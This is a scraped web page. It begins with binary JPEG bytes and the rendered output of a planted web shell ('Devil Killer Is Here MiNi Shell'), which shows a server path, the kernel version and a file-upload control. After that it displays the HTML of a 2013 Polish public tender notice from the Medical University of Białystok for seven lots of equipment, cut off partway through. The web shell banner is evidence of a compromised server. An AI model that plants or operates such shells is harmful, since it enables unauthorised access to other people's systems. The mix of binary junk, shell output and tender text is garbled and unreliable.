JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130129/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130129/39330-N-2013.html

<p class="kh_header"><b>Białystok: Dostawa wyposażenia do Budynku Collegium Pathologicum Uniwersytetu Medycznego w Białymstoku z podziałem na siedem części.</b><br>
<b>Numer ogłoszenia: 39330 - 2013; data zamieszczenia: 29.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Białymstoku , ul. Jana Kilińskiego 1, 15-089 Białystok, woj. podlaskie, tel. 085 7485400, faks 085 7485627.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia do Budynku Collegium Pathologicum Uniwersytetu Medycznego w Białymstoku z podziałem na siedem części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: dostawa, wraz z rozładunkiem, wniesieniem, montażem, instalacją, uruchomieniem oraz przeszkoleniem personelu Użytkownika, wyposażenia do budynku Collegium Pathologicum Uniwersytetu Medycznego w Białymstoku z podziałem na siedem części jak niżej:
 
Część nr 1- Podajniki i pojemniki na szczotki chirurgiczne-1 kpl.
	
Część nr 2 - Sprzęt AGD i aparaty telefoniczne - 1 kpl.	
   
Część nr 3 - Wyposażenie meblowe - 1 kpl.
	
Część nr 4 - Komory pralnicze i basen jednokomorowy - 1 kpl.
     
Część nr 5 - Wózki do transportu i ekspozycji trumien - 1 kpl.
 
Część nr 6 - Pojemniki na mydło i środek dezynfekcyjny - 1 kpl.
     
Część nr 7 - Lampy bakteriobójcze - 1 kpl.

Uwaga  
1) Szczegółowy opis przedmiotu zamówienia, wymagane parametry oraz wymagania 
    dodatkowe i ogólne przedmiotu zamówienia zawierają załączniki: 
a) Nr 2 (OPIS PRZEDMIOTU ZAMÓWIENIA) - dotyczy części Nr 1, 2, 3, 5, 6, 7,
b) Nr 2 (OPIS PRZEDMIOTU ZAMÓWIENIA - FORMULARZ CENOWY) - dotyczy    części  Nr 4,
c) Nr 3 (FORMULARZ CENOWY) - dotyczy części Nr 3, 
stanowiące integralną część SIWZ.
2) Do części Nr 3 dołączono załącznik: Cz. 3 Zdjęcia pomieszczeń.doc.
3) Do części Nr 4 dołączono załącznik: Cz. 4 Wzór komory pralniczej z szafką.doc..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 39.71.11.00-0, 39.15.00.00-8, 39.15.00.00-8, 33.94.20.00-5, 39.15.00.00-8, 31.51.50.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego oświadczenia z art. 22 ust. 1 ustawy Pzp - Załącznik Nr  5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane należycie. Przez dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia Zamawiający rozumie minimum: jedną  dostawę wyposażenia odpowiadającego swoim rodzajem dostawie stanowiącej przedmiot zamówienia w poszczególnych częściach o wartości minimum: CZĘŚĆ 1 - 3.000,00 PLN BRUTTO; CZĘŚĆ  2 - 4.000,00 PLN BRUTTO; CZĘŚĆ 3 - 12.000,00 PLN BRUTTO; CZĘŚĆ 4 - 3.000,00 PLN BRUTTO; CZĘŚĆ  5 -5.000,00 PLN BRUTTO; CZĘŚĆ 6 - 4.000,00 PLN BRUTTO; CZĘŚĆ  7 - 6.000,00 PLN BRUTTO  - sporządzony wykaz według wzoru druku Załącznik Nr 8 do SIWZ.
Wykonawca wskaże w wykazie wartość, przedmiot zamówienia, daty wykonania i 
odbiorców oraz załączy dokumenty potwierdzające, że wykazane dostawy zostały 
zrealizowane należycie np. opinie, referencje, faktury, protokoły odbioru, przy czym 
dokumenty takie jak faktury, protokoły odbioru powinny potwierdzać należyte 
wykonanie zamówienia w sposób nie budzący wątpliwości, a zapisy w nich zawarte nie mogą ograniczać się jedynie do potwierdzenia ilości dostarczonego wyposażenia.
Wartości podane w walutach obcych zostaną przeliczone przez Zamawiającego 
na PLN zgodnie z średnim kursem ogłoszonym przez NBP z dnia otwarcia ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie  załączonego oświadczenia z art. 22 ust. 1 ustawy Pzp - Załącznik Nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie  załączonego oświadczenia z art. 22 ust. 1 ustawy Pzp - Załącznik Nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie  załączonego oświadczenia z art. 22 ust. 1 ustawy Pzp - Załącznik Nr 5 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Prospekt i/lub folder oferowanego sprzętu  - dotyczy części nr 1, 2, 4, 6, 7.
2) Prospekt i/lub folder lub rysunki techniczne/rysunki projektów oferowanego sprzętu  - dotyczy części nr 5.
3) Opisy techniczne i/lub funkcjonalne oferowanego wyposażenia. Wymagane oznaczenie i opis w celu łatwej identyfikacji przez Zamawiającego - dotyczy części nr 3.
4)Wszystkie niezbędne certyfikaty i atesty dotyczące zastosowanych materiałów (np. płyta meblowa, zastosowane obrzeże, itp.). Wymagane oznaczenie i opis w celu łatwej identyfikacji przez Zamawiającego - dotyczy części nr 3.
5)Deklaracja zgodności/certyfikat zgodności CE świadczący o zgodności urządzenia z europejskimi warunkami bezpieczeństwa - dotyczy części nr 1, 2, 4, 5, 6, 7.
6)Oświadczenie, że zaoferowany przedmiot zamówienia jest dopuszczony do obrotu na terytorium RP, posiada wszelkie wymagane przez przepisy prawa świadectwa, certyfikaty, atesty, deklaracje zgodności, itp. oraz spełnia wszelkie wymagane przez przepisy prawa wymogi w zakresie norm bezpieczeństwa obsługi, oraz, że dokumenty te dostarczy na każde żądanie Zamawiającego - na Formularzu ofertowym - załącznik Nr 1 do SIWZ.   
7)W przypadku rozwiązań równoważnych wskazać (podać dokumenty tj. atesty polskie i europejskie, certyfikaty art. potwierdzające równoważność proponowanych przez    Wykonawcę rozwiązań w trybie art. 29 ust. 3 ustawy - Prawo zamówień publicznych, dołączając wykaz w/w dokumentów z podaniem nazwy podmiotu wydającego przedmiotowy dokument - (tylko w przypadku składania oferty równoważnej z opisem przedmiotu zamówienia).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony przez Wykonawcę Formularz ofertowy - załącznik nr 1 do SIWZ. 
2) Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli  osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego w ust. 2.  pkt  2)  - w oryginale lub poświadczone notarialnie, 
3)wypełnioną Tabelę OPISU PRZEDMIOTU ZAMÓWIENIA - załącznik Nr 2 do SIWZ (w zależności od części zamówienia, w której Wykonawca składa ofertę), 
4) wypełniony FORMULARZ CENOWY - załącznik Nr 3 do SIWZ (w zależności od 
    części zamówienia, w której Wykonawca składa ofertę), 
5) wypełnioną Tabelę WARUNKI GWARANCJI I SERWISU GWARANCYJNEGO - 
     Załącznik Nr 4  (w zależności od części zamówienia, w której Wykonawca składa ofertę), 
6)  wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć 
     podwykonawcom (jeżeli są przewidywani - załączyć załącznik Nr 7 do SIWZ).
7)  wypełniony załącznik Nr 10 do SIWZ - (tylko w przypadku składania oferty
      równoważnej z opisem przedmiotu zamówienia).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych.
2. Zmiana umowy jest możliwa w sytuacji gdy:
a.konieczność zmiany wynika z okoliczności, których nie dało się przewidzieć w dacie zawarcia umowy, 
b.zmieniły się przepisy, których regulacje wpływają na prawa i obowiązki stron, 
c.zmiana jest korzystna dla Kupującego,
d.istnieje konieczność przesunięcia terminu  wykonania Umowy z przyczyn leżących po stronie Kupującego w szczególności z powodu:
- opóźnienia się Wykonawcy robót budowlanych w terminowym wykonaniu prac remontowych pomieszczeń w siedzibie Użytkownika, w których ma być dokonana instalacja przedmiotu zamówienia,
- wstrzymania prac remontowych pomieszczeń, w których ma być dokonana instalacja przedmiotu zamówienia,
e. istnieje konieczność przesunięcia terminu  wykonania Umowy z przyczyn zewnętrznych niezależnych od Kupującego oraz Sprzedającego, skutkujących niemożliwością dokonania instalacji przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umb.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Medyczny w Białymstoku, Dział zamówień publicznych, pok. 12, ul. A. Mickiewicza 2C, 15-222 Białystok..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2013 godzina 11:00, miejsce: Kancelaria Ogólna Uniwersytetu Medycznego w Białymstoku (lewe skrzydło Pałacu Branickich, parter) ul. Jana Kilińskiego 1, 15-089 Białystok..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podajniki i pojemniki na szczotki chirurgiczne-1 kpl..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa, wraz z rozładunkiem, wniesieniem, montażem, instalacją, uruchomieniem oraz przeszkoleniem personelu Użytkownika, wyposażenia do budynku Collegium Pathologicum Uniwersytetu Medycznego w Białymstoku, t.j.: Podajniki i pojemniki na szczotki chirurgiczne-1 kpl.
Szczegółowy opis przedmiotu zamówienia, wymagane parametry oraz wymagania 
dodatkowe i ogólne przedmiotu zamówienia zawiera załącznik: Nr 2 (OPIS PRZEDMIOTU ZAMÓWIENIA)stanowiący integralną część SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzęt AGD i aparaty telefoniczne - 1 kpl..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa, wraz z rozładunkiem, wniesieniem, montażem, instalacją, uruchomieniem oraz przeszkoleniem personelu Użytkownika, wyposażenia do budynku Collegium Pathologicum Uniwersytetu Medycznego w Białymstoku tj.: Sprzęt AGD i aparaty telefoniczne - 1 kpl. 
Szczegółowy opis przedmiotu zamówienia, wymagane parametry oraz wymagania 
dodatkowe i ogólne przedmiotu zamówienia zawiera załącznik: Nr 2 (OPIS PRZEDMIOTU ZAMÓWIENIA) stanowiący integralną część SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyposażenie meblowe - 1 kpl..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa, wraz z rozładunkiem, wniesieniem, montażem, instalacją, uruchomieniem oraz przeszkoleniem personelu Użytkownika, wyposażenia do budynku Collegium Pathologicum Uniwersytetu Medycznego w Białymstoku t.j.: Wyposażenie meblowe - 1 kpl.
1) Szczegółowy opis przedmiotu zamówienia, wymagane parametry oraz wymagania 
    dodatkowe i ogólne przedmiotu zamówienia zawierają załączniki: 
    a)  Nr 2 (OPIS PRZEDMIOTU ZAMÓWIENIA),
    b)  Nr 3 (FORMULARZ CENOWY) - dotyczy części Nr 3, 
    stanowiące integralną część SIWZ.
2) Do części Nr 3 dołączono załącznik: Cz. 3 Zdjęcia pomieszczeń.doc..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. Warunkigwarancji i serwisu gwarancyjnego - 20.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Komory pralnicze i basen jednokomorowy - 1 kpl..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa, wraz z rozładunkiem, wniesieniem, montażem, instalacją, uruchomieniem oraz przeszkoleniem personelu Użytkownika, wyposażenia do budynku Collegium Pathologicum Uniwersytetu Medycznego w Białymstoku t. j.:Komory pralnicze i basen jednokomorowy - 1 kpl.
1) Szczegółowy opis przedmiotu zamówienia, wymagane parametry oraz wymagania 
    dodatkowe i ogólne przedmiotu zamówienia zawierają załącznik  Nr 2 (OPIS   
    PRZEDMIOTU ZAMÓWIENIA - FORMULARZ CENOWY) stanowiący integralną 
    część SIWZ.
2) Do części Nr 4 dołączono załącznik: Cz. 4 Wzór komory pralniczej z szafką.doc..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wózki do transportu i ekspozycji trumien - 1 kpl..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa, wraz z rozładunkiem, wniesieniem, montażem, instalacją, uruchomieniem oraz przeszkoleniem personelu Użytkownika, wyposażenia do budynku Collegium Pathologicum Uniwersytetu Medycznego w Białymstoku t. j.:Wózki do transportu i ekspozycji trumien - 1 kpl.
Szczegółowy opis przedmiotu zamówienia, wymagane parametry oraz wymagania dodatkowe i ogólne przedmiotu zamówienia zawiera załącznik Nr 2 (OPIS PRZEDMIOTU ZAMÓWIENIA) stanowiący integralną część SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.94.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 85.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pojemniki na mydło i środek dezynfekcyjny - 1 kpl..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa, wraz z rozładunkiem, wniesieniem, montażem, instalacją, uruchomieniem oraz przeszkoleniem personelu Użytkownika, wyposażenia do budynku Collegium Pathologicum Uniwersytetu Medycznego w Białymstoku t. j.:Pojemniki na mydło i środek dezynfekcyjny - 1 kpl.
Szczegółowy opis przedmiotu zamówienia, wymagane parametry oraz wymagania 
dodatkowe i ogólne przedmiotu zamówienia zawiera załącznik Nr 2 (OPIS PRZEDMIOTU ZAMÓWIENIA) stanowiący integralną część SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
